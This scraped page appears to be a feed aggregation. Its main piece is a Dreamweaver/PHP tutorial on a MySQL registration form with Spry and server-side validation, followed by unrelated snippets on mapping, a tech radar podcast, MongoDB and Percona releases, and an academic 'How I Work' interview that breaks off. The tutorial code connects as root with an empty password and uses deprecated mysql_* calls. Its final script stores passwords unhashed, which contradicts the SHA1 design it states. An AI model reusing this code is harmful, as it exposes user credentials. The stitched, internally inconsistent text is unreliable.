          Can anybody confirm?



Registration Form with AJAX and PHP Validation
You may often be annoyed by forms you have built. You expect an email field to be filled with an email address, but someone mischievously enters something that isn't an email; frustrating, isn't it? Not to mention visitors who leave fields empty, so that all they see is an SQL error message. A password and username that should be at least 6 characters long turn out to be entered by many users with only 4 characters. So how do you put filters on your form so that the submitted data is reasonably accurate? Note: this tutorial is intended for users of Dreamweaver CS4 and above.
This tutorial combines Dreamweaver's Spry (AJAX) functionality with a PHP script to filter the data entered by users. From this tutorial you should learn how to:
1. Build a registration form with AJAX/JavaScript filtering
2. Activate the Insert Record form behavior
3. Filter data before it enters the database

Before starting this tutorial, make sure you have worked through these two tutorials:
1. Creating a Site Definition in Dreamweaver CS5, and
2. Creating a PHP MySQL database connection with Dreamweaver CS5

MySQL database requirements

In this example, you will create a users table with the following columns:
• id, the primary key
• nama, a field to store the name
• email, a field to store the email address
• username, a field to store the username. The username is expected to be at least 6 characters long.
• password, a field to store the password. The password is expected to be at least 6 characters long and stored as an SHA1 hash.
• tanggal, to store the date the record was last updated
Here is the SQL for the users table.


          CREATE TABLE IF NOT EXISTS `users` (
          `id` int(11) NOT NULL AUTO_INCREMENT,
          `nama` varchar(64) NOT NULL,
          `email` varchar(64) NOT NULL,
          `username` varchar(64) NOT NULL,
          `password` varchar(64) NOT NULL,
          `tanggal` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
          PRIMARY KEY (`id`)
          ) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;


File structure and the registration form

This tutorial uses a file saved as validasi_data.php, while the style.css file is stored in the css folder. The folder and file structure for this tutorial is:
• Connections, a folder that holds the database connection file: koneksi.php.
• css, a folder that holds the style.css file.
• validasi_data.php, the file that will be used for the exercise.

Database connection: koneksi.php
This file connects to the database:

          <?php
          # FileName="Connection_php_mysql.htm"
          # Type="MYSQL"
          # HTTP="true"
          $hostname_koneksi = "localhost";
          $database_koneksi = "tutorial_blog";
          $username_koneksi = "root";
          $password_koneksi = "";
          $koneksi = mysql_pconnect($hostname_koneksi, $username_koneksi, $password_koneksi) or trigger_error(mysql_error(),E_USER_ERROR);
          ?>


The style.css file controls the appearance of the web page
Here is that file:


          body {
          background-color: #063;
          margin: 0px;
          padding: 0px;
          }
          form {
          background-color: #E7E7E7;
          padding: 20px;
          border: thin solid #CECECE;
          border-radius: 5px;
          }
          label {
          font-size: 14px;
          font-weight: bold;
          text-transform: capitalize;
          display: block;
          }
          input {
          padding: 5px 10px;
          }
          h1 {
          padding-bottom: 10px;
          border-bottom: solid thin #D4D4D4;
          font-size: 18px;
          }
          a, a:visited {
          text-decoration: none;
          }
          a:hover {
          color: #900;
          }
          #wrapper {
          font-family: Tahoma, Geneva, sans-serif;
          background-color: #FFF;
          margin: auto;
          padding: 20px 30px;
          height: auto;
          width: 960px;
          border-right-width: 5px;
          border-right-style: solid;
          border-right-color: #CCC;
          border-bottom-width: 5px;
          border-left-width: 5px;
          border-bottom-style: solid;
          border-left-style: solid;
          border-bottom-color: #CCC;
          border-left-color: #CCC;
          border-bottom-left-radius: 5px;
          border-bottom-right-radius: 5px;
          }
          img {
          max-width: 900px;
          padding: 10px;
          border: solid thin #F9F;
          background-color: #FFC;
          height: auto;
          }
          .warning {
          background-color: #FCF;
          color: #900;
          padding: 5px 10px;
          border: solid thin #900;
          border-radius: 5px;
          }

The exercise file: validasi_data.php

This is the main file you will work on in this tutorial; here is its script:

          <!DOCTYPE HTML>
          <html>
          <head>
          <meta charset="utf-8">
          <title>Untitled Document</title>
          <link href="css/style.css" rel="stylesheet" type="text/css">
          </head>
          <body>
          <div id="wrapper">
          <h1><a href="http://www.javawebmedia.com">Home</a> | <a href="http://www.javawebmedia.com">About Java Web Media</a> | <a href="http://www.javawebmedia.com">Course</a> | <a href="http://www.javawebmedia.com">Contact Us</a></h1>
          <h2>Registration form</h2>
          <p>Form registrasi ada di sini</p>
          </div>
          </body>
          </html>

Creating the data input form

The next step is to create the form for entering the data. See the image above.
1. Switch your Workspace to Design View (see the image above).
2. Select the placeholder text Form registrasi ada di sini and delete it.
3. Click Insert > Form > Form.
4. Click Insert > Spry > Spry Validation Textfield.
5. In the ID field enter nama and in the Label field enter Nama Anda:. Click OK.

6. Place your cursor to the right of the nama input field, then press Enter.
7. Click Insert > Spry > Spry Validation Textfield. In the ID field enter email and in the Label field enter Alamat email Anda:. Click OK.
8. Place your cursor to the right of the email input field, then press Enter.
9. Click Insert > Spry > Spry Validation Textfield. In the ID field enter username and in the Label field enter Username Anda:. Click OK.
10. Place your cursor to the right of the username input field, then press Enter.
11. Click Insert > Spry > Spry Validation Password (this feature is only available in Dreamweaver CS4 and above). In the ID field enter password and in the Label field enter Password Anda:. Click OK.
12. Place your cursor to the right of the password input field, then press Enter.
13. Click Insert > Form > Button. In the ID field enter submit. Leave the Label empty, then click OK.
14. Click the Submit button that appears, copy it, and paste the copy next to the Submit button.

15. Click the second Submit button you just pasted, then change it to a Reset form button via the Properties panel.
16. Save your work. If a pop-up appears asking whether the Spry files should be saved, click OK.

Choosing the type and length of data to filter using AJAX/Spry

In this step, you will learn to use the Spry facilities provided by Dreamweaver. The Spry feature works much like AJAX. When you are working in Design View, every time you hover over a form field to which you attached a Spry widget, Dreamweaver will display a blue notification on that widget.
Spry is not difficult to learn and is easy to use.
Click that notification or pop-up, and the Spry settings will appear in the Properties window at the bottom of your workspace. In the example below, Spry Textfield2 is selected.

Some of the settings you should understand:
• Type, the type of data you want to validate. In this example, Email Address.
• Format, the writing format. Not used in this example.
• Pattern, the text pattern. Not used in this example.
• Hint, displays guide text telling visitors what type and format of data to enter.
• Min chars, the minimum number of characters that must be typed.
• Max chars, the maximum number of characters allowed.
• Validate on, when validation should be triggered. By default Dreamweaver selects Submit. In this example Blur and Change are also enabled, which means Spry will show an error message even before you have finished typing.
• Required, meaning the field must be filled in. If an input field is optional, you can uncheck this.

Using the Spry settings above, configure the data filters as follows. In this example, these are the filters applied to each input field:
• nama, at least 5 characters and required. Validate on: Blur and Change enabled.
• email, the type must be an email address, with the hint contact@javawebmedia.com. Validate on: Blur and Change enabled.
• username, at least 6 and at most 16 characters. Validate on: Blur and Change enabled.
• password, at least 6 and at most 32 characters. Validate on: Blur and Change enabled.
• Save your work again.

Changing the Spry appearance via CSS

If you look closely, the default Spry layout is not very attractive: warning messages appear in red with a red border. In this step, you will learn to customize its appearance via CSS.

SpryValidationTextfield.css

If you are using Dreamweaver CS4 or above, click the SpryValidationTextfield.css file in the related files menu. Then change line 33 of that file so that it becomes:

.textfieldRequiredState .textfieldRequiredMsg, 
          .textfieldInvalidFormatState .textfieldInvalidFormatMsg,
          .textfieldMinValueState .textfieldMinValueMsg,
          .textfieldMaxValueState .textfieldMaxValueMsg,
          .textfieldMinCharsState .textfieldMinCharsMsg,
          .textfieldMaxCharsState .textfieldMaxCharsMsg
          {
          display: block;
          color: #CC3333;
          }
Then on line 73, which originally reads:
.textfieldHintState input, input.textfieldHintState { /*color: red !important;*/ }
Change it to:
.textfieldHintState input, input.textfieldHintState { /*color: red !important;*/ color: #CCC; }



Save your SpryValidationTextfield.css file again. You can modify SpryValidationPassword.css in much the same way. Below is the result of customizing the Spry layout.

Activating the Insert Record form

You have now built a basic filter for the data being entered. This Spry feature is only useful as long as the user has not turned off JavaScript in their browser. If JavaScript is disabled, the Spry validation does nothing.

The next step is to activate the Insert Record behavior. Follow these steps:
1. Click back into the Source code view of the file in Dreamweaver (see the image).
2. Click Insert > Data Objects > Insert Record > Insert Record.
3. Submit values from: form1
4. Connections: koneksi
5. Insert table: users
6. Columns: make sure only id and tanggal do not receive a value.
7. After inserting, go to: validasi_data.php
8. Click OK.
9. Save your work again.
You have successfully activated the Insert Record behavior.

Server-side validation using PHP

Server-side validation (or filtering) is the second line of defense for when a user has disabled your JavaScript/AJAX validation.
Around line 37 of the code, you will find this:
          $editFormAction = $_SERVER['PHP_SELF'];

          if (isset($_SERVER['QUERY_STRING'])) {

$editFormAction .= "?" . htmlentities($_SERVER['QUERY_STRING']);

          }

Press Enter after that code, then add the code below (the first two lines are repeated only to show where the new code belongs):

          $editFormAction .= "?" . htmlentities($_SERVER['QUERY_STRING']);
          }
//Check whether an error occurred
$error = array();
$MM_flag="MM_insert";
// Validate the input
if (isset($_POST[$MM_flag])) {
//Check the length of nama; if it is empty or shorter than 5 characters, ERROR
          if((strlen($_POST['nama']) < 5)) {
          $error['nama'] = "Nama harus diisi dengan minimal 5 karakter";
          }
// Check the email address
          $checkEmail = '/^[^@]+@[^\s\r\n\'";,@%]+$/';
          if (!preg_match($checkEmail, trim($_POST['email']))) {
          $error['email'] = "Alamat email salah";
          }
//Check the username length
          $_POST['username'] = trim($_POST['username']);
          if(strlen($_POST['username']) < 6 || strlen($_POST['username']) > 16) {
          $error['username'] = "Username minimal 6 karakter dan maksimal 16 karakter";
          }
          // Check password
          $_POST['password'] = trim($_POST['password']);
          if(strlen($_POST['password']) < 6 || strlen($_POST['password']) > 32){
          $error['password'] = "Password 6 karakter dan maksimal 32 karakter";
          }
          }
// If no errors occurred
          if(!$error) {
          if ((isset($_POST["MM_insert"])) && ($_POST["MM_insert"] == "form1")) {

Then on line 82, which originally looks like this:
          }
          header(sprintf("Location: %s", $insertGoTo));
          }


Change it to:


          header(sprintf("Location: %s", $insertGoTo));
          }
          $_POST = array();
          }

Save your work again.
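
One gap worth flagging, again as a note that is not in the original tutorial: the table design above asks for the password to be stored as an SHA1 hash, but the generated Insert Record code passes the raw value to GetSQLValueString(). A minimal sketch of one way to close that gap is to hash the value after the validation checks (so the 6-32 character length rule still applies to what the user typed) and before the if(!$error) block that performs the insert; sha1() is standard PHP, although password_hash() would be the stronger choice for new code:

// Hash the validated password before the Insert Record block builds its SQL.
// Place this after the validation checks and before the if(!$error) { ... } block.
if (!$error && isset($_POST['password'])) {
$_POST['password'] = sha1($_POST['password']);
}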

Displaying error messages

The next step is to display an error message when the data submitted by a visitor does not meet the criteria you set.

Find the code below:


          <h2>Registration form</h2> <form name="form1" method="POST" action="<?php echo $editFormAction; ?>">

Change it to:

          <h2>Registration form</h2>

          <?php if($error) { ?>
          <p class="warning">
          <strong>Ada kesalahan dalam proses pengisian data:</strong><br/>
          <?php foreach($error as $peringatan) { ?>
          - <?php echo $peringatan; ?><br/>
          <?php } ?>
          </p>
          <?php } ?>
          <form name="form1" method="POST" action="<?php echo $editFormAction; ?>">

To test this at the server-side level, make sure you disable JavaScript in the browser, then click the Submit button.

You have completed this basic data validation tutorial. Good luck trying it out.
The final script is as follows:

          <?php require_once('Connections/koneksi.php'); ?>
          <?php
          if (!function_exists("GetSQLValueString")) {
          function GetSQLValueString($theValue, $theType, $theDefinedValue = "", $theNotDefinedValue = "")
          {
          if (PHP_VERSION < 6) {
          $theValue = get_magic_quotes_gpc() ? stripslashes($theValue) : $theValue;
          }
          $theValue = function_exists("mysql_real_escape_string") ? mysql_real_escape_string($theValue) : mysql_escape_string($theValue);
          switch ($theType) {
          case "text":
          $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL";
          break;
          case "long":
          case "int":
          $theValue = ($theValue != "") ? intval($theValue) : "NULL";
          break;
          case "double":
          $theValue = ($theValue != "") ? doubleval($theValue) : "NULL";
          break;
          case "date":
          $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL";
          break;
          case "defined":
          $theValue = ($theValue != "") ? $theDefinedValue : $theNotDefinedValue;
          break;
          }
          return $theValue;
          }
          }
          $editFormAction = $_SERVER['PHP_SELF'];
          if (isset($_SERVER['QUERY_STRING'])) {
          $editFormAction .= "?" . htmlentities($_SERVER['QUERY_STRING']);
          }
//Check whether an error occurred
$error = array();
$MM_flag="MM_insert";
// Validate the input
if (isset($_POST[$MM_flag])) {
//Check the nama length
          if((strlen($_POST['nama']) < 5)) {
          $error['nama'] = "Nama minimal 5 karakter";
          }
// Check the email address
          $checkEmail = '/^[^@]+@[^\s\r\n\'";,@%]+$/';
          if (!preg_match($checkEmail, trim($_POST['email']))) {
          $error['email'] = "Alamat email salah";
          }
//Check the username length
          $_POST['username'] = trim($_POST['username']);
          if(strlen($_POST['username']) < 6 || strlen($_POST['username']) > 16) {
          $error['username'] = "Username minimal 6 karakter dan maksimal 16 karakter";
          }
          // Check password
          $_POST['password'] = trim($_POST['password']);
          if(strlen($_POST['password']) < 6 || strlen($_POST['password']) > 32){
          $error['password'] = "Password 6 karakter dan maksimal 32 karakter";
          }
          }
// If no errors occurred
          if(!$error) {
          if ((isset($_POST["MM_insert"])) && ($_POST["MM_insert"] == "form1")) {
          $insertSQL = sprintf("INSERT INTO users (nama, email, username, password) VALUES (%s, %s, %s, %s)",
          GetSQLValueString($_POST['nama'], "text"),
          GetSQLValueString($_POST['email'], "text"),
          GetSQLValueString($_POST['username'], "text"),
          GetSQLValueString($_POST['password'], "text"));
          mysql_select_db($database_koneksi, $koneksi);
          $Result1 = mysql_query($insertSQL, $koneksi) or die(mysql_error());
          $insertGoTo = "validasi_data.php";
          if (isset($_SERVER['QUERY_STRING'])) {
          $insertGoTo .= (strpos($insertGoTo, '?')) ? "&" : "?";
          $insertGoTo .= $_SERVER['QUERY_STRING'];
          }
          header(sprintf("Location: %s", $insertGoTo));
          }
          $_POST = array();
          }
          ?>
          <!DOCTYPE HTML>
          <html>
          <head>
          <meta charset="utf-8">
          <title>Untitled Document</title>
          <link href="css/style.css" rel="stylesheet" type="text/css">
          <script src="SpryAssets/SpryValidationTextField.js" type="text/javascript"></script>
          <script src="SpryAssets/SpryValidationPassword.js" type="text/javascript"></script>
          <link href="SpryAssets/SpryValidationTextField.css" rel="stylesheet" type="text/css">
          <link href="SpryAssets/SpryValidationPassword.css" rel="stylesheet" type="text/css">
          </head>
          <body>
          <div id="wrapper">
          <h1><a href="http://www.javawebmedia.com">Home</a> | <a href="http://www.javawebmedia.com">About Java Web Media</a> | <a href="http://www.javawebmedia.com">Course</a> | <a href="http://www.javawebmedia.com">Contact Us</a></h1>
          <h2>Registration form</h2>

          <?php if($error) { ?>
          <p class="warning">
          <strong>Ada kesalahan dalam proses pengisian data:</strong><br/>
          <?php foreach($error as $peringatan) { ?>
          - <?php echo $peringatan; ?><br/>
          <?php } ?>
          </p>
          <?php } ?>
          <form name="form1" method="POST" action="<?php echo $editFormAction; ?>">
          <span id="sprytextfield1">
          <label for="nama">Nama Anda:</label>
          <input type="text" name="nama" id="nama">
          <span class="textfieldRequiredMsg">A value is required.</span><span class="textfieldMinCharsMsg">Minimum number of characters not met.</span></span>
          <p><span id="sprytextfield2">
          <label for="email">Alamat email Anda:</label>
          <input type="text" name="email" id="email">
          <span class="textfieldRequiredMsg">A value is required.</span><span class="textfieldInvalidFormatMsg">Invalid format.</span></span></p>
          <p><span id="sprytextfield3">
          <label for="username">Username Anda:</label>
          <input type="text" name="username" id="username">
          <span class="textfieldRequiredMsg">A value is required.</span><span class="textfieldMinCharsMsg">Minimum number of characters not met.</span><span class="textfieldMaxCharsMsg">Exceeded maximum number of characters.</span></span></p>
          <p><span id="sprypassword1">
          <label for="password">Password Anda:</label>
          <input type="password" name="password" id="password">
          <span class="passwordRequiredMsg">A value is required.</span><span class="passwordMinCharsMsg">Minimum number of characters not met.</span><span class="passwordMaxCharsMsg">Exceeded maximum number of characters.</span></span></p>
          <p>
          <input type="submit" name="submit" id="submit" value="Submit">
          <input type="reset" name="submit2" id="submit2" value="Reset">
          </p>
          <input type="hidden" name="MM_insert" value="form1">
          </form>
          <p>&nbsp;</p>
          </div>
          <script type="text/javascript">
          var sprytextfield1 = new Spry.Widget.ValidationTextField("sprytextfield1", "none", {minChars:5, validateOn:["blur", "change"]});
          var sprytextfield2 = new Spry.Widget.ValidationTextField("sprytextfield2", "email", {validateOn:["blur", "change"], hint:"contact@javawebmedia.com"});
          var sprytextfield3 = new Spry.Widget.ValidationTextField("sprytextfield3", "none", {minChars:6, maxChars:16, validateOn:["blur", "change"]});
          var sprypassword1 = new Spry.Widget.ValidationPassword("sprypassword1", {minChars:6, maxChars:32, validateOn:["blur", "change"]});
          </script>
          </body>
          </html> 
           

           
           
           

                    Mapping for the busy cartographer: today moving dots        
This article describes how to make a quick map using some nice services we have at our hands. Nowadays almost everyone can create a map using services like CartoDB, Mapbox, uMap or even Google My Maps. In this case I’ll show how I used the incredible flexibility of CartoDB to combine some Postgres/PostGIS SQL with CartoCSS […]
                    On My Radar?        

          Mark Mandel and Kai Koenig were recently inspired by the ThoughtWorks "Technology Radar" to create their own, which they featured in episode 31 of 2 Devs Down Under, their conversational podcast. Because they're both somewhere along the spectrum of CFML-to-ex-CFML developers and have worked with Flex etc, their opinions on various technologies are probably of more interest to other CFML developers than the original ThoughtWorks radar. This podcast episode is longer than usual - nearly two hours - and Mark and Kai would love to hear your responses in comments. I decided my response was a bit too long to post as a comment, so I am turning it into a blog post instead.

          The first category they covered is "Techniques" and their top two items are things that are top of my list as well: devops (infrastructure as code) and automated deployment. I've been advocating automation of builds and deployments for a long time and I'm always looking for better ways to manage these tasks. At World Singles, we've been using Ant for our build process and we're reaching the limits of what we can do easily so we're looking at code-based solutions instead, and we're also looking at devops via Pallet (Clojure-based specification of servers and software configuration). On the flipside, they advise "hold" on hand built infrastructure and one-off deployments - and I completely agree with them on that.

          Also in their "adopt" or "trial" sections for techniques are SPA (Single Page Applications) and modular development with JavaScript. As we move into a world of mobile web applications, MVC on the client side is inevitable and something we're going to need to live with. JavaScript is not a language well-suited to large scale development and the lack of modules or namespaces has led to a number of workaround techniques and clever libraries (covered later). We'll eventually get native modules in JavaScript but, like many other issues with JavaScript, we're hamstrung by older browsers so adoption will be painfully slow. I'd recommend looking at other compile-to-JS languages that have native support for modular development and can bury the JS issues in a cross-browser manner (my personal preference is ClojureScript, of course, and that will come up again later).

          Finally in techniques, they have Agile in adopt and Waterfall in hold. Two decades ago I worked in a process/QA-focused company that advocated a "V" process to replace Waterfall in the enterprise, and for the last decade I would have advocated Agile instead of Waterfall, so I'm with Kai and Mark on that. I know Agile still has its detractors but I don't think Waterfall still has any supporters left?

          Next, Kai and Mark move on to "Platform" and perhaps controversially put Apache, IIS and MySQL into the "hold" section. Given Oracle's track record, I can certainly understand their concerns with MySQL - and at work we've been bumping heads with its performance limitations and would agree that it is not easy to provide robustness (in terms of replication and failover). As someone who won't put Windows servers into production, I can only smile at IIS being in this section but I was surprised by Apache's inclusion. The web server to "adopt" they say is Nginx and I'm about to start assessing that so I won't argue overall. Also in their "adopt" / "trial" / "assess" sections are a broad spread of no-SQL databases - which I also agree with. Mark recommends PostgreSQL on the grounds that he's seeing a lot of recommendations for it. I've looked at it a couple of times and, to me, it seems to have all the complexity of Oracle, combined with some very quirky non-standard behavior - but, like Mark, I keep hearing good things about it. Personally, I'd rather move fully onto MongoDB at this point because of the flexibility it provides in terms of schemas and data storage, combined with simple (and solid) replication and sharding for robustness and scalability. The final item on Mark's "assess" list that I'd call out is Hazelcast which is a very impressive piece of technology: it is a library that provides distributed versions of several standard Java data structures. This makes it insanely easy to set up distributed caches using the same data structures you're already using in your application, so you hardly need to make any code changes to be able to leverage clustering. Definitely worth a look.

          Next we move onto "Tools" and Mark, in particular, recommends a lot of things that I am not familiar enough with to agree or disagree. Mark recommends Ansible and Vagrant where I'd probably lean toward Pallet and VMFest but, given Ansible is Python-based, I suspect Ansible would be a lot more approachable for many developers. Kai puts the Brackets editor from Adobe in the "trial" section which is an interesting choice. As a lightweight editor for HTML / CSS / JS, it's probably got a lot going for it but I'm keeping my eye on LightTable which, like Brackets, is also based on CodeMirror but offers some very interesting live evaluation options for JavaScript, Python and Clojure (and ClojureScript). Like Brackets, LightTable is designed to be extensible but full plugin support is something we'll get in the upcoming 0.5 release which is when I think LightTable will become very, very exciting! Both Kai and Mark put Eclipse in the "hold" section (which I agree with - it's become pretty bloated and plugin version compatibility can be a problem, esp. when Adobe's ColdFusion Builder is based on such an old build of Eclipse). Strangely - to me - they both put IntelliJ in "adopt". I've tried IntelliJ several times and I really can't get on with it. I find it to be every bit as bloated and complex as Eclipse, but far less usable. I can sympathize far more with Kai's recommendation of Sublime Text although, again, I just can't get on with it. I find it to be fussy and counter-intuitive in many areas, although a couple of my team members love it. My weapon of choice for editing is Emacs but I'm not going to try to convince everyone to use it. If you're doing Clojure development, it's probably the best-supported option, and it is extremely powerful but at the same time, quite lightweight.

          Along with Eclipse, Kai and Mark throw quite a few other tools under the bus: FTP for deployment, Ant, Maven, and Dreamweaver. If you're doing server-side development, I have to agree with all of these. I use Ant but really don't like it, I have to use Maven occasionally for Clojure contrib projects and don't like that either - do we really need to be programming in XML? I think Dreamweaver is probably still a great choice for front end design work but CSS and JS support has improved so much in so many lightweight, open source editors that I find it hard to get enthusiastic about Dreamweaver even in that realm.

          Finally Mark and Kai move onto "Languages & Frameworks" and they have a lot of JS-related recommendations which... well, I just can't find it in myself to like JS. The more I work with it, the less I like it. I know it's ubiquitous but as far as I'm concerned, it deserves to be the assembler of the web and no more. There are an increasing number of compile-to-JS languages now that provide some compelling choices. If I was a Windows guy, I'd probably be pushing WebSharper and FunScript which both offer F#-to-JS compilation, built on top of TypeScript. A statically typed functional language is a good choice for targeting JavaScript and papering over its many flaws. For a more general functional language, ClojureScript offers Clojure-to-JS compilation and that will be my choice as we move into more complex JS territory at work I expect. Both Mark and Kai recommend Clojure, which I was pleased to see (of course). Mark also recommends JRuby and Kai recommends Python. I had both on my list of languages to learn but having spent some time with both of them (Ruby via "Programming Languages" on Coursera; Python via 10gen's MongoDB for Developers, and attending PyCon), I've taken Ruby off that list and plan to spend more time with Python, probably in a system scripting capacity.

          Perhaps of more interest to our audience is their position on CFML: Mark puts CFML in the "hold" section and Kai puts Adobe ColdFusion in the "hold" section but puts Railo in the "adopt" section. They have quite a discussion about this and I think this is the part of their podcast that should generate the most comments...

          This also matches with Mark being essentially "ex-CFML" whilst Kai is still "CFML". I'm not quite "ex-CFML" but I'm no longer really "CFML" either. I understand Mark's point of view - that no one in the world at large is going to start a project in CFML - but I'm somewhat fascinated by Kai's optimism and it makes me re-examine my own position on CFML. At World Singles we're using CFML for the View-Controller portion of our application and it still makes sense. We're using Railo but I have to admit that even Railo feels a bit bloated for the VC portion - because we're using such a small subset of CFML at this point. That said, CFML is a wonderful templating language, and script-based controllers are a decent way to glue any Model to your Views. I've previously said we wouldn't bother upgrading beyond Railo 3.3 yet we're in the process of standing up two new servers as upgrade replacements for two of our existing servers, and we've decided to deploy Java 7, Tomcat 7, and Railo 4 - and now will upgrade the third server (and QA and all our dev environments eventually) to the same. Which means we'll start using closures in CFML and it will continue to have a renewed lease on life for a while.

          Would I start a new greenfield project in CFML? Until recently I would probably have said "no" but now I'm not so sure. Would I ever start a new greenfield project in Adobe ColdFusion? No, that makes no sense at all in this age of free open source languages and frameworks. But Railo 4? It's a possibility. With their continued evolution of the language and the system's overall facilities (such as command line execution), I might just consider them for future projects... and continue using a hybrid of CFML for the View-Controller / container portion of the application, with Clojure for the Model. That was my big surprise after listening to Mark and Kai for two hours.


                    This article shows you how to create a MongoDB application using ZKGrails 2.2. Credits to Chanwit Kaewkasi.        
At the end of this article, you will find yourself able to create a simple MongoDB application with ZK and Grails.

                    Serverside Pagination with ZK, Spring Data MongoDB and Google Maps        

Ashish's 3rd small talk on mongoDB shows how to develop a non-relational database-driven ZK app with Spring Data
Ashish's third small talk on mongoDB guides users through developing a non-relational database-driven ZK app using Spring Data. For more information, please read here.

Ashish's 2nd small talk on mongoDB guides you through the development of a non-relational database-driven ZK app using Morphia
Ashish's second small talk on mongoDB shows how users can develop a non-relational database-driven ZK application using Morphia. For more detailed information, please read here.

Ashish has written a small talk on how to develop a non-relational database-driven ZK app using the mongoDB Java Driver
          Ashish has written a small talk showing how developers can develop a non-relational database-driven ZK application using the mongoDB Java Driver. For more detailed information, please read here.

                    Percona Live Europe 2017 Sneak Peek Schedule Up Now! See Available Sessions!        
We are excited to announce that the sneak peek schedule for the Percona Live Open Source Database Conference Europe 2017 is up! The Percona Live Open Source Database Conference Europe 2017 is September 25 – 27, at the Radisson Blu Royal Hotel. The theme of Percona Live Europe 2017 is Championing Open Source Databases, with sessions on MySQL, MariaDB, MongoDB and […]
                    Percona Toolkit 3.0.4 is Now Available        
Percona announces the release of Percona Toolkit 3.0.4 on August 2, 2017. Percona Toolkit is a collection of advanced command-line tools that perform a variety of MySQL and MongoDB server and system tasks too difficult or complex for DBAs to perform manually. Percona Toolkit, like all Percona software, is free and open source. You can download Percona Toolkit packages from the […]
                    Percona Server for MongoDB 3.4.6-1.7 is Now Available        
Percona announces the release of Percona Server for MongoDB 3.4.6-1.7 on August 2, 2017. Download the latest version from the Percona web site or the Percona Software Repositories. Percona Server for MongoDB is an enhanced, open source, fully compatible, highly-scalable, zero-maintenance downtime database supporting the MongoDB v3.4 protocol and drivers. It extends MongoDB with Percona Memory Engine and MongoRocks storage engine, as well as several enterprise-grade features: External […]
                    Group Replication: The Sweet and the Sour        
In this blog, we'll look at group replication and how it deals with flow control (FC) and replication lag. Overview: In the last few months, we had two main actors in the MySQL ecosystem: ProxySQL and Group-Replication (with the evolution to InnoDB Cluster). While I have extensively covered the first, my last serious work on […]
                    Percona Server for MongoDB 3.4.6-1.6 is Now Available        
Percona announces the release of Percona Server for MongoDB 3.4.6-1.6 on July 27, 2017. Download the latest version from the Percona web site or the Percona Software Repositories. Percona Server for MongoDB is an enhanced, open source, fully compatible, highly-scalable, zero-maintenance downtime database supporting the MongoDB v3.4 protocol and drivers. It extends MongoDB with Percona Memory Engine and MongoRocks storage engine, as well as several enterprise-grade features: External […]
                    Business Intelligence Platform: Tutorial Using MongoDB Aggregation Pipeline        
In today's data-driven world, researchers are busy answering interesting questions by churning through huge volumes of data. Some obvious challenges they face are due to the sheer size of the datasets they have to deal with. In this article, we take a peek at a simple business intelligence platform implemented on top of the MongoDB Aggregation Pipeline.
                    I am Annelies Van de Ven and This is How I Work        
          Today, I have the pleasure of interviewing Annelies Van de Ven in the "How I Work" series. Annelies started out her academic career studying classical archaeology at the University of St Andrews, but soon found her way into reception and museum studies. Though her MA is in Ancient History and Archaeology, and she is currently doing a degree within the archaeology department at the University of Melbourne, she considers herself a proud interdisciplinary researcher and is currently doing a video project that focuses on possible interdisciplinary futures within the Faculty of Arts at her institution.

Current Job: I am doing a PhD full time, as well as working as a university tutor, trench supervisor, and research and curatorial assistant on a casual basis.
          Current Location: Istanbul, trying to get permissions to go excavate our site.
          Current mobile device: An iPhone 6 that was given to me as a combined birthday and graduation present.
Current computer: A slightly dented HP laptop; the sticker on the keyboard tells me it is an Intel Core i5.

          Can you briefly explain your current situation and research to us?

I am currently a full time international PhD student on a university funded scholarship at the University of Melbourne. I just passed the 3rd year review hurdle, so I am nearing the end. I am currently set to submit in mid-September, and at this moment in March I have about 90% of my thesis written. The main issue at the moment is cutting words, editing my spelling/grammar, and finessing my appendices and bibliography, which is going rather slowly.

          My research focuses on how museums can better present archaeological objects, for a more engaging visitor experience. I am looking specifically at the Cyrus Cylinder, analysing how people perceive it, and whether these perceptions have been addressed in its past and present display strategies.
          I live with my partner who completed his PhD in bio-chemical engineering last year and is currently working as a researcher at the university while I finish my thesis.

          What tools, apps and software are essential to your workflow?

Well, Dropbox, Microsoft Outlook, Word, Excel and PowerPoint are pretty essential. I also have a fantastic app called Camera Scan, which means I can scan books in my office rather than having to spend hours hogging the printer.

When I am teaching, the LMS and Turnitin are the main tools I use. I don't print out student essays unless I have to; I think I use up enough paper already.

When I am in the field I use FileMaker for databases, GIS or CartoDB for mapping, as well as Illustrator, Photoshop or CorelDRAW for illustrations. There are a number of other, more specialised software packages for archaeologists that we use for our surveying, artefact processing and data analysis, but they are not in my field of expertise.

For communicating I mainly use Gmail, but lately, as more and more academics create social media accounts on Facebook and Twitter, I find more of my communication going through those channels.

          What does your workspace setup look like?
I am lucky in that my department guarantees us international research students a space throughout our candidature. However, I have changed offices five times over the past 3 and a half years. I started on a part-time desk in an open-plan area called the ‘research corner’. This was a communal space where early-degree history, philosophy, classics and archaeology postgraduates were placed. There were no computers provided, but most of us had laptops and the library was not far off. The next year I was moved to a corridor in the attic. There were only 8 of us in the office, all classicists or archaeologists, and we were all given computers. However, the space was possum-infested, and though the possums couldn't get into our office space, others on our corridor were not so lucky, and we all suffered from the smell. The year after that I was moved to a different office on the floor below, which seemed far too large and grand for 2 grad students; we even had our own bookshelves. I was only able to stay there for 1 semester before the entire department was moved to a new building, Arts West. Here I was given a desk in an open-plan space on the top floor right across from the printer, as shown in the photograph below. The views were fantastic, and the height of the desk could be adjusted, but the number of people coming in and out was not particularly conducive to work.



          The latest move brought me to an office 2 floors below the open plan area, as shown in the photograph below. I now share this office with 2 other archaeologists, who are both wonderful to work with.



After moving so many times I have learned to keep less stuff in my office; however, this means that my desk at home has become increasingly cluttered, and I have started working at the dining table rather than sitting at my desk when at home (see below). I also regularly try to switch it up and go work at a colleague’s house, in a café, or in one of the communal reading rooms on campus.



          What is your best advice for productive academic work?

          Erm… don’t listen to other people’s advice? Find what works for you.
I have found over the years that the advice given by university staff and supervisors doesn't always match up with my personal experience. I don't necessarily work better in silence, I do not write out full references while writing, I like working in a group setting, and I don't work to a fixed schedule. These things work for me, but not for everyone. So try things out and see what works for you.

          How do you keep an overview of projects and tasks?
I used to literally just have a piece of paper with a list of things I needed to do, organised into rough themes. I loved crossing things off the list. However, I soon realised this was not the most efficient way of doing things, as I ended up having to re-write the list every few days and ended up with about 5 different versions of it. So I now have a digital to-do list that is organised by deadline, priority and the effort needed to complete each task.

          Besides phone and computer, do you use other technological tools in work and daily life?
